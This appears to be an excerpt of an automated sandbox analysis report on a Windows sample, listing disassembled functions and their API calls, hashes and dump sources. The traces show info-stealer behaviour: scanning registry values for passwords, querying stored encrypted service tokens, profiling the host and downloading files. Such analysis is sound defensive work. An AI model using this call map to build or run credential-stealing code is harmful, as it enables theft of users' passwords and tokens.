                                                                                                                                                                                                                                                                                        • InternetOpenA.WININET(0041D79B,00000000,00000000,00000000,00000000), ref: 00404CAA
                                                                                                                                                                                                                                                                                        • InternetOpenUrlA.WININET(?,00000000,00000000,00000000,04000100,00000000), ref: 00404CD1
                                                                                                                                                                                                                                                                                        • InternetReadFile.WININET(c.A,?,00000400,00000000), ref: 00404D01
                                                                                                                                                                                                                                                                                        • InternetCloseHandle.WININET(c.A), ref: 00404D75
                                                                                                                                                                                                                                                                                        • InternetCloseHandle.WININET(?), ref: 00404D82
                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000002.00000002.2429852227.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2429852227.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2429852227.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2429852227.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2429852227.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_2_2_400000_u3z0.jbxd
                                                                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: Internet$CloseHandleHeapOpen$AllocateFileProcessRead
                                                                                                                                                                                                                                                                                        • String ID: c.A$c.A
                                                                                                                                                                                                                                                                                        • API String ID: 3066467675-270182787
                                                                                                                                                                                                                                                                                        • Opcode ID: 0de907d42740b73276ee4841b6eaeb85befe0f9a3eb9d020644180b68549cc61
                                                                                                                                                                                                                                                                                        • Instruction ID: 93472a029acc8278824907ab7d145ea178407da7df790c597300061c638fc298
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 0de907d42740b73276ee4841b6eaeb85befe0f9a3eb9d020644180b68549cc61
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 3731F8F4A00218ABDB20DF54DD85BDDB7B5BB88304F5081D9F709A7280DB746AC58F98
                                                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                        Function 00406CA0 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 149registrymemoryCOMMON
                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • memset.MSVCRT ref: 00406CE4
                                                                                                                                                                                                                                                                                        • RegOpenKeyExA.KERNEL32(80000001,?,00000000,00020019,?), ref: 00406D0A
                                                                                                                                                                                                                                                                                        • RegEnumValueA.ADVAPI32(?,00000000,00000000,000000FF,00000000,00000003,?,?), ref: 00406D81
                                                                                                                                                                                                                                                                                        • StrStrA.SHLWAPI(00000000,Password,00000000), ref: 00406DDD
                                                                                                                                                                                                                                                                                        • GetProcessHeap.KERNEL32(00000000,?,?,?,?,?,`v@,80000001,h0A,?,?,?,?,?,00407660,?), ref: 00406E22
                                                                                                                                                                                                                                                                                        • HeapFree.KERNEL32(00000000,?,?,?,?,`v@,80000001,h0A,?,?,?,?,?,00407660,?), ref: 00406E29
                                                                                                                                                                                                                                                                                          • Part of subcall function 00408C20: vsprintf_s.MSVCRT ref: 00408C3B
                                                                                                                                                                                                                                                                                        • task.LIBCPMTD ref: 00406F25
                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000002.00000002.2429852227.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2429852227.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2429852227.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2429852227.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2429852227.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_2_2_400000_u3z0.jbxd
                                                                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: Heap$EnumFreeOpenProcessValuememsettaskvsprintf_s
                                                                                                                                                                                                                                                                                        • String ID: Password
                                                                                                                                                                                                                                                                                        • API String ID: 2698061284-3434357891
                                                                                                                                                                                                                                                                                        • Opcode ID: e5b433d59e683e3853dabaec4553a197e9f76ed1b5df22dde85a26ca8bf12c56
                                                                                                                                                                                                                                                                                        • Instruction ID: 212e66a44237aadac39c144ffd634e87161c2b2b5cb707631054264fe3c499ea
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: e5b433d59e683e3853dabaec4553a197e9f76ed1b5df22dde85a26ca8bf12c56
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 4F613FB5D042589BDB24DB50CC45BDAB7B8BF44304F0081EAE64AA6281DF746FC9CF95
                                                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                        Function 004141C0 Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 89memoryCOMMON
                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • GetWindowsDirectoryA.KERNEL32(?,00000104), ref: 004141DF
                                                                                                                                                                                                                                                                                        • GetVolumeInformationA.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0041421C
                                                                                                                                                                                                                                                                                        • GetProcessHeap.KERNEL32(00000000,00000104), ref: 004142A0
                                                                                                                                                                                                                                                                                        • HeapAlloc.KERNEL32(00000000), ref: 004142A7
                                                                                                                                                                                                                                                                                        • wsprintfA.USER32 ref: 004142DD
                                                                                                                                                                                                                                                                                          • Part of subcall function 00416D40: lstrcpy.KERNEL32(0041D6E3,00000000), ref: 00416D88
                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000002.00000002.2429852227.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2429852227.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2429852227.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2429852227.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2429852227.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_2_2_400000_u3z0.jbxd
                                                                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: Heap$AllocDirectoryInformationProcessVolumeWindowslstrcpywsprintf
                                                                                                                                                                                                                                                                                        • String ID: :$C$\
                                                                                                                                                                                                                                                                                        • API String ID: 3790021787-3809124531
                                                                                                                                                                                                                                                                                        • Opcode ID: 6ca11245975395cfb749b767d31339a8af53aa26318921bdecc0eb4ed934f432
                                                                                                                                                                                                                                                                                        • Instruction ID: 52054a8b39965f6583c41ffabf349f0ba0ed2356e3a02770a6039194ee1378f4
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 6ca11245975395cfb749b767d31339a8af53aa26318921bdecc0eb4ed934f432
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: BA3194B0D00258EBDF20DFA4DC45BEE77B4AF48304F104099F5496B281DB78AAD5CB95
                                                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                        Function 004093A0 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 82filememoryCOMMON
                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 004093CC
                                                                                                                                                                                                                                                                                        • GetFileSizeEx.KERNEL32(000000FF,?), ref: 004093F1
                                                                                                                                                                                                                                                                                        • LocalAlloc.KERNEL32(00000040,?), ref: 00409411
                                                                                                                                                                                                                                                                                        • ReadFile.KERNEL32(000000FF,?,00000000,'@,00000000), ref: 0040943A
                                                                                                                                                                                                                                                                                        • LocalFree.KERNEL32('@), ref: 00409470
                                                                                                                                                                                                                                                                                        • FindCloseChangeNotification.KERNEL32(000000FF), ref: 0040947A
                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000002.00000002.2429852227.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2429852227.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2429852227.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2429852227.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2429852227.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_2_2_400000_u3z0.jbxd
                                                                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: File$Local$AllocChangeCloseCreateFindFreeNotificationReadSize
                                                                                                                                                                                                                                                                                        • String ID: '@$'@
                                                                                                                                                                                                                                                                                        • API String ID: 1815715184-345573653
                                                                                                                                                                                                                                                                                        • Opcode ID: 8b55da906079f4b7e2c67570a1be054e10abea7064ba0d58136f1bac8616076b
                                                                                                                                                                                                                                                                                        • Instruction ID: e17ca2bf8fb39da35cf654cfb04ed30359ebe63801e33f8f777122e55a65d6c5
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 8b55da906079f4b7e2c67570a1be054e10abea7064ba0d58136f1bac8616076b
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 0B31EA74A00209EFDB24DF94C885BAEB7B5BF48314F108169E915A73D0D778AD42CFA5
                                                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                        Function 00414960 Relevance: 14.0, APIs: 6, Strings: 2, Instructions: 50memoryCOMMON
                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • GetProcessHeap.KERNEL32(00000000,00000104,?,00000000,00000000,?,04406340,00000000,?,0041D774,00000000,?,00000000,00000000,?,044062B0), ref: 0041496D
                                                                                                                                                                                                                                                                                        • HeapAlloc.KERNEL32(00000000), ref: 00414974
                                                                                                                                                                                                                                                                                        • GlobalMemoryStatusEx.KERNEL32(00000040), ref: 00414995
                                                                                                                                                                                                                                                                                        • __aulldiv.LIBCMT ref: 004149AF
                                                                                                                                                                                                                                                                                        • __aulldiv.LIBCMT ref: 004149BD
                                                                                                                                                                                                                                                                                        • wsprintfA.USER32 ref: 004149E9
                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000002.00000002.2429852227.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2429852227.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2429852227.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2429852227.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2429852227.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_2_2_400000_u3z0.jbxd
                                                                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: Heap__aulldiv$AllocGlobalMemoryProcessStatuswsprintf
                                                                                                                                                                                                                                                                                        • String ID: %d MB$@
                                                                                                                                                                                                                                                                                        • API String ID: 2886426298-3474575989
                                                                                                                                                                                                                                                                                        • Opcode ID: f62cb7ad2578be9c21b89e6e1bf921e4f1007482674ad6998ac9b57a816d1492
                                                                                                                                                                                                                                                                                        • Instruction ID: f510475f390b20142bb5ad9b480526056b42ea6839ab7368ec165d8bd78ed5c1
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: f62cb7ad2578be9c21b89e6e1bf921e4f1007482674ad6998ac9b57a816d1492
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 84111EB0D40208ABDB10DFE4CC49FAE77B8BB48704F104549F715BB284D7B8A9418B99
                                                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                        Function 00405D40 Relevance: 13.6, APIs: 9, Instructions: 133networkfileCOMMON
                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                          • Part of subcall function 00416DA0: lstrcpy.KERNEL32(?,00000000), ref: 00416DE6
                                                                                                                                                                                                                                                                                          • Part of subcall function 00404470: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 004044F6
                                                                                                                                                                                                                                                                                          • Part of subcall function 00404470: InternetCrackUrlA.WININET(00000000,00000000), ref: 00404506
                                                                                                                                                                                                                                                                                        • InternetOpenA.WININET(0041D7D3,00000001,00000000,00000000,00000000), ref: 00405DAF
                                                                                                                                                                                                                                                                                        • StrCmpCA.SHLWAPI(?,044035B0), ref: 00405DE7
                                                                                                                                                                                                                                                                                        • InternetOpenUrlA.WININET(00000000,00000000,00000000,00000000,00000100,00000000), ref: 00405E2F
                                                                                                                                                                                                                                                                                        • CreateFileA.KERNEL32(00000000,40000000,00000003,00000000,00000002,00000080,00000000), ref: 00405E53
                                                                                                                                                                                                                                                                                        • InternetReadFile.WININET(00410E73,?,00000400,?), ref: 00405E7C
                                                                                                                                                                                                                                                                                        • WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 00405EAA
                                                                                                                                                                                                                                                                                        • CloseHandle.KERNEL32(?,?,00000400), ref: 00405EE9
                                                                                                                                                                                                                                                                                        • InternetCloseHandle.WININET(00410E73), ref: 00405EF3
                                                                                                                                                                                                                                                                                        • InternetCloseHandle.WININET(00000000), ref: 00405F00
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000002.00000002.2429852227.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2429852227.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2429852227.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2429852227.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2429852227.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_2_2_400000_u3z0.jbxd
                                                                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: Internet$CloseFileHandle$Open$CrackCreateReadWritelstrcpylstrlen
                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                        • API String ID: 2507841554-0
                                                                                                                                                                                                                                                                                        • Opcode ID: 33d80e034ad8f542e0ef5a467f467662f582e0545ae4ff6488c0ef396ccf234c
                                                                                                                                                                                                                                                                                        • Instruction ID: 46018c2d0393d599e49b8942d3c4f4431f3cc1562104312217daf3d911a1fc92
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 33d80e034ad8f542e0ef5a467f467662f582e0545ae4ff6488c0ef396ccf234c
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: DB514471A00618ABDB20DF51CC45BEF7779EB44305F1081AAB645B71C0DB78AB85CF99
                                                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                        Function 00413D90 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 136COMMON
                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • ??_U@YAPAXI@Z.MSVCRT ref: 00413D9E
                                                                                                                                                                                                                                                                                          • Part of subcall function 00416D40: lstrcpy.KERNEL32(0041D6E3,00000000), ref: 00416D88
                                                                                                                                                                                                                                                                                        • OpenProcess.KERNEL32(001FFFFF,00000000,00413FCD,0041D28B), ref: 00413DDC
                                                                                                                                                                                                                                                                                        • memset.MSVCRT ref: 00413E2A
                                                                                                                                                                                                                                                                                        • ??_V@YAXPAX@Z.MSVCRT ref: 00413F7E
                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                        • 65 79 41 69 64 48 6C 77 49 6A 6F 67 49 6B 70 58 56 43 49 73 49 43 4A 68 62 47 63 69 4F 69 41 69 52 57 52 45 55 30 45 69 49 48 30, xrefs: 00413E4C
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000002.00000002.2429852227.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2429852227.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2429852227.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2429852227.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2429852227.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_2_2_400000_u3z0.jbxd
                                                                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: OpenProcesslstrcpymemset
                                                                                                                                                                                                                                                                                        • String ID: 65 79 41 69 64 48 6C 77 49 6A 6F 67 49 6B 70 58 56 43 49 73 49 43 4A 68 62 47 63 69 4F 69 41 69 52 57 52 45 55 30 45 69 49 48 30
                                                                                                                                                                                                                                                                                        • API String ID: 224852652-4138519520
                                                                                                                                                                                                                                                                                        • Opcode ID: 58fa82f264080733bae1e7b8f01e14ae4a67fe3ffc4adbed189253538e0755ae
                                                                                                                                                                                                                                                                                        • Instruction ID: ba4a912f34a6ab240f03399ec897c117189ceb9282cc0eaf369c81769a73d46f
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 58fa82f264080733bae1e7b8f01e14ae4a67fe3ffc4adbed189253538e0755ae
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 35513DB0D003189BDB24EF51DC45BEEBB75AB48309F5041AEE11966281DB386BC9CF58
                                                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                        Function 0040B250 Relevance: 12.3, APIs: 4, Strings: 4, Instructions: 274stringCOMMON
                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                          • Part of subcall function 00416D40: lstrcpy.KERNEL32(0041D6E3,00000000), ref: 00416D88
                                                                                                                                                                                                                                                                                          • Part of subcall function 00416FB0: lstrlen.KERNEL32(?,0041D8B0,?,00000000,0041D6E3), ref: 00416FC5
                                                                                                                                                                                                                                                                                          • Part of subcall function 00416FB0: lstrcpy.KERNEL32(00000000), ref: 00417004
                                                                                                                                                                                                                                                                                          • Part of subcall function 00416FB0: lstrcat.KERNEL32(00000000,00000000), ref: 00417012
                                                                                                                                                                                                                                                                                          • Part of subcall function 00416F20: lstrcpy.KERNEL32(00000000,?), ref: 00416F72
                                                                                                                                                                                                                                                                                          • Part of subcall function 00416F20: lstrcat.KERNEL32(00000000), ref: 00416F82
                                                                                                                                                                                                                                                                                          • Part of subcall function 00416EA0: lstrcpy.KERNEL32(?,0041D6E3), ref: 00416F05
                                                                                                                                                                                                                                                                                          • Part of subcall function 004097F0: memcmp.MSVCRT ref: 0040980B
                                                                                                                                                                                                                                                                                          • Part of subcall function 004097F0: memset.MSVCRT ref: 0040983E
                                                                                                                                                                                                                                                                                          • Part of subcall function 004097F0: LocalAlloc.KERNEL32(00000040,?), ref: 0040988E
                                                                                                                                                                                                                                                                                        • lstrlen.KERNEL32(00000000), ref: 0040B44D
                                                                                                                                                                                                                                                                                          • Part of subcall function 00415530: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00415552
                                                                                                                                                                                                                                                                                        • StrStrA.SHLWAPI(00000000,AccountId), ref: 0040B47B
                                                                                                                                                                                                                                                                                        • lstrlen.KERNEL32(00000000), ref: 0040B553
                                                                                                                                                                                                                                                                                        • lstrlen.KERNEL32(00000000), ref: 0040B567
                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000002.00000002.2429852227.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2429852227.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2429852227.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2429852227.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2429852227.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_2_2_400000_u3z0.jbxd
                                                                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: lstrcpylstrlen$AllocLocallstrcat$memcmpmemset
                                                                                                                                                                                                                                                                                        • String ID: AccountId$AccountTokens$AccountTokens$SELECT service, encrypted_token FROM token_service
                                                                                                                                                                                                                                                                                        • API String ID: 2910778473-1079375795
                                                                                                                                                                                                                                                                                        • Opcode ID: c3e420af064c0a708796640bde459702700c5fd34751eff28f339fbe0379e7de
                                                                                                                                                                                                                                                                                        • Instruction ID: df2f8e8a8ca21c55da42a3c6f19f5118b3684059388f817d0631ea5bb79e5354
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: c3e420af064c0a708796640bde459702700c5fd34751eff28f339fbe0379e7de
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 07A164759102089BCF14FBA1DC52EEE7739BF54308F51416EF506B2191EF38AA85CBA8
                                                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                        Function 00414B79 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 59registrystringCOMMON
                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • RegEnumKeyExA.KERNEL32(00000000,00000000,?,00000400,00000000,00000000,00000000,00000000), ref: 00414BC3
                                                                                                                                                                                                                                                                                        • wsprintfA.USER32 ref: 00414BF6
                                                                                                                                                                                                                                                                                        • RegOpenKeyExA.KERNEL32(00000000,?,00000000,00020019,00000000), ref: 00414C18
                                                                                                                                                                                                                                                                                        • RegCloseKey.ADVAPI32(00000000), ref: 00414C29
                                                                                                                                                                                                                                                                                        • RegCloseKey.ADVAPI32(00000000), ref: 00414C36
                                                                                                                                                                                                                                                                                          • Part of subcall function 00416DA0: lstrcpy.KERNEL32(?,00000000), ref: 00416DE6
                                                                                                                                                                                                                                                                                        • RegQueryValueExA.KERNEL32(00000000,04406430,00000000,000F003F,?,00000400), ref: 00414C89
                                                                                                                                                                                                                                                                                        • lstrlen.KERNEL32(?), ref: 00414C9E
                                                                                                                                                                                                                                                                                        • RegQueryValueExA.KERNEL32(00000000,044063B8,00000000,000F003F,?,00000400,00000000,?,?,00000000,?,0041D4B4), ref: 00414D36
                                                                                                                                                                                                                                                                                        • RegCloseKey.KERNEL32(00000000), ref: 00414DA5
                                                                                                                                                                                                                                                                                        • RegCloseKey.ADVAPI32(00000000), ref: 00414DB7
                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000002.00000002.2429852227.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2429852227.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2429852227.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2429852227.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2429852227.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_2_2_400000_u3z0.jbxd
                                                                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: Close$QueryValue$EnumOpenlstrcpylstrlenwsprintf
                                                                                                                                                                                                                                                                                        • String ID: %s\%s
                                                                                                                                                                                                                                                                                        • API String ID: 3896182533-4073750446
                                                                                                                                                                                                                                                                                        • Opcode ID: 531daa6300200cb92d5b1988fc21d9558b480b48c1d4f7758da1487724698403
                                                                                                                                                                                                                                                                                        • Instruction ID: d244d91c33a18a5b0a6d9a0a642cdc181f43283702d6765b4fd500d7f5e12fa2
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 531daa6300200cb92d5b1988fc21d9558b480b48c1d4f7758da1487724698403
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 59213875A0021CABDB64CB50DC85FE973B9BF88300F0085D9A649A6180DF74AAC6CFE4
                                                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                        Function 00411D80 Relevance: 9.1, APIs: 6, Instructions: 124registrystringCOMMON
                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • memset.MSVCRT ref: 00411DA5
                                                                                                                                                                                                                                                                                        • RegOpenKeyExA.KERNEL32(80000001,04406918,00000000,00020119,?), ref: 00411DC4
                                                                                                                                                                                                                                                                                        • RegQueryValueExA.ADVAPI32(?,04408108,00000000,00000000,00000000,000000FF), ref: 00411DE8
                                                                                                                                                                                                                                                                                        • RegCloseKey.ADVAPI32(?), ref: 00411DF2
                                                                                                                                                                                                                                                                                        • lstrcat.KERNEL32(?,00000000), ref: 00411E17
                                                                                                                                                                                                                                                                                        • lstrcat.KERNEL32(?,044080D8), ref: 00411E2B
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000002.00000002.2429852227.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2429852227.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
